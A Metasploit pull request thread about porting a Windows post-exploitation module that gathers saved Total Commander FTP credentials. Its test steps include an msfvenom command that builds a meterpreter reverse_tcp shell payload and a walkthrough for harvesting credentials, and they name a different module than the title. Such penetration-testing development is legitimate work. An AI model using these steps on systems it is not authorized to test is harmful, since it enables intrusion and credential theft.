### PR TITLE
Update total_command post module to use the new cred API

### PR DESCRIPTION
**Pull request by void-in**
This patch updates the post/windows/gather/credentials/total_command module to use the new cred API.
- Download total commander from the official download page at http://www.ghisler.com/amazons3.php
- After installation, go to Net -> FTP Connect and press New Connection
- Fill out the Session, Host, Username, and Password fields
- In a new terminal, create a payload: ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your IP] lport=4444 -f exe -o /tmp/test.exe
- Drag and drop the payload executable to Windows, double click on it.
- At the meterpreter prompt, run background
- do: use post/multi/gather/dbvis_enum
- do: set SESSION [session-id]
- do: run
- After the module is completed, run the creds command, The newly discovered credentials should be displayed

``` ruby
Credentials
===========

host          service                 public             private   realm  private_type
----          -------                 ------             -------   -----  ------------
                                                                          Blank password
1.1.1.1       3306/tcp (mysql)        test               test             Password
1.1.1.1       54321/tcp (postgresql)  msf_user           password         Password
1.1.1.1       21/tcp (ftp)            msf_user           password         Password
```

### CODE REVIEW

**Comment by wchen-r7** [comment]
Hey @void-in, it looks like the PR is the same as: https://github.com/rapid7/metasploit-framework/pull/5449

Can I close this one and merge the changes on my branch? I'll make sure to credit you. Thanks!

**Comment by void-in** [comment]
@wchen-r7 That's right. Sorry for the duplicate. I was searching which modules have been ported to the creds. At that time I didn't find you have an outstanding PR. If one thing you can change please: the variable names in the decrypt method should be more descriptive. I will generate a PR for your branch so that you could easily merge it with yours.

**Comment by wchen-r7** [comment]
I will do that, thanks!

**Comment by wchen-r7** [comment]
Ok done!

**Pull request closed without merging**
